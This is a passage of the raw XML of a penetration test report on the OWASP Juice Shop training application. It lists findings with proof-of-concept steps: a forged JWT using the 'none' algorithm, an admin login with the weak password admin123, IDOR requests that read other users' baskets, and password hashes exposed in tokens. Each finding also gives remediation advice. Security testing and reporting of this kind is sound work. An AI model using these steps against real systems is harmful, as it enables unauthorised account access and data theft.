      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do not distribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">warning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Full content of confidential acquisitions.md showing business plans:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId78">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">images/finding-3fdd0e16-0e1c-44a1-bd08-f50a108aad5b-9-misconfig-acquisitions-content.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="79"/>
    <w:bookmarkEnd w:id="80"/>
    <w:bookmarkStart w:id="82" w:name="finding-6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="81" w:name="jwt-none-algorithm-authentication-bypass"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JWT None Algorithm Authentication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9">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http://juiceshop:3000/api/Users/, http://juiceshop:3000/rest/basket/, http://juiceshop:3000/rest/admin/application-configuration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accepts JWT tokens with the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">algorithm, allowing complete authentication bypass. An attacker can forge a JWT token by setting the algorithm header to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and omitting the signature portion.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="81"/>
    <w:bookmarkEnd w:id="82"/>
    <w:bookmarkStart w:id="83" w:name="impact"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Complete authentication bypass allowing unauthenticated attackers to:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Access all user data via /api/Users/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Access any user’s basket via /rest/basket/{id}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Access admin functionality</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="83"/>
    <w:bookmarkStart w:id="84" w:name="proof-of-concept"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create a forged JWT with header: {</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">typ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">JWT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">alg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use payload: {</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">success</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:{</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:1,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">admin@juice-sh.op</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">role</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,…}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Send request: curl http://juiceshop:3000/api/Users/ -H</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Authorization: Bearer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Server returns full user list without valid signature</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="84"/>
    <w:bookmarkStart w:id="85" w:name="affected-endpoints"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Affected Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/api/Users/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/rest/basket/{id}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/rest/admin/application-configuration</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="85"/>
    <w:bookmarkStart w:id="87" w:name="remediation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reject JWT tokens with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">algorithm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enforce RS256 signature verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Validate algorithm against allowlist</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8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JWT None Algorithm Bypass - Successful user enumeration with forged token:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId86">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">images/finding-96393f3c-3173-4c3b-929f-9c7e85326a81-10-jwt-none-algorithm-bypass-20260227-004.json</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="87"/>
    <w:bookmarkStart w:id="89" w:name="finding-7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="88" w:name="X844dbd462f538b1b11f0961217a7407d2799484"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Weak Admin Credentials - Authentication Bypass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9">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http://juiceshop:3000/#/administration</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admin account uses weak, guessable credentials (admin@juice-sh.op / admin123) allowing complete administrative access to the application.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="88"/>
    <w:bookmarkEnd w:id="89"/>
    <w:bookmarkStart w:id="90" w:name="impact-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Full administrative access to the application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Access to all user data and baskets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ability to view customer feedback</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Access to application configuration</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="90"/>
    <w:bookmarkStart w:id="91" w:name="proof-of-concept-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">POST /rest/user/login with credentials:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">email: admin@juice-sh.op</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">password: admin123</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Server returns valid admin JWT token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use token to access admin panel at /#/administration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">View all registered users and customer feedback</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="91"/>
    <w:bookmarkStart w:id="92" w:name="affected-accounts"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Affected Accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@juice-sh.op:admin123</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="92"/>
    <w:bookmarkStart w:id="96" w:name="remediation-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enforce strong password policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement account lockout after failed attempts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Require multi-factor authentication for admin accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Change default/weak credentials immediately</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24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Admin Panel Access via Weak Credentials - Visual evidence of admin interface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3371361"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Admin Panel Access via Weak Credentials - Visual evidence of admin interface" title="" id="94" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="images/finding-b219710b-05a1-4a23-8b6b-56441fa1cd6d-11-admin-panel-access-20260227-003.png" id="95" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId93"/>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Admin Panel Access via Weak Credentials - Visual evidence of admin interface</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="96"/>
    <w:bookmarkStart w:id="99" w:name="finding-8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="98" w:name="X2e9637610628ec35e0c3e0be89615f4484d5657"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Insecure Direct Object Reference (IDOR) on Basket Endpoints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4.3</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:hyperlink r:id="rId97">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N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http://juiceshop:3000/rest/basket/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/rest/basket/{id} endpoint lacks proper authorization checks, allowing authenticated users to access other users’ basket contents by incrementing the basket ID parameter.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="98"/>
    <w:bookmarkEnd w:id="99"/>
    <w:bookmarkStart w:id="100" w:name="impact-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Horizontal privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unauthorized access to other customers’ shopping baskets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disclosure of products other users are purchasing</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="100"/>
    <w:bookmarkStart w:id="101" w:name="proof-of-concept-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Authenticate as admin (user ID 1, basket ID 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Access basket 1: GET /rest/basket/1 (authorized - own basket)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Access basket 2: GET /rest/basket/2 (IDOR - Jim’s basket)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Access basket 3: GET /rest/basket/3 (IDOR - Bender’s basket)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All requests return successfully with other users’ basket contents</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="101"/>
    <w:bookmarkStart w:id="102" w:name="evidence"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Basket 2 (User ID 2 - jim@juice-sh.op): Contains Raspberry Juice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Basket 3 (User ID 3 - bender@juice-sh.op): Contains Raspberry Juice</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="102"/>
    <w:bookmarkStart w:id="103" w:name="affected-endpoints-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Affected Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/rest/basket/{id}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="103"/>
    <w:bookmarkStart w:id="104" w:name="remediation-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement authorization checks to verify basket ownership</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use indirect reference maps (UUIDs instead of sequential IDs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Validate user permissions before returning basket data</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104"/>
    <w:bookmarkStart w:id="106" w:name="finding-9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="105" w:name="password-hash-disclosure-in-jwt-token"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Password Hash Disclosure in JWT Token</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65">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http://juiceshop:3000/rest/user/login, http://juiceshop:3000/rest/user/whoami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JWT token contains the user’s MD5 password hash in the payload data. This allows anyone with access to the token to potentially crack the password offline.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="105"/>
    <w:bookmarkEnd w:id="106"/>
    <w:bookmarkStart w:id="107" w:name="impact-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Password hash exposure in JWT payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Offline password cracking possible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Account compromise if password is cracked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Credential reuse attacks</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="107"/>
    <w:bookmarkStart w:id="108" w:name="proof-of-concept-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Login with valid credentials: POST /rest/user/login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Server returns JWT token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
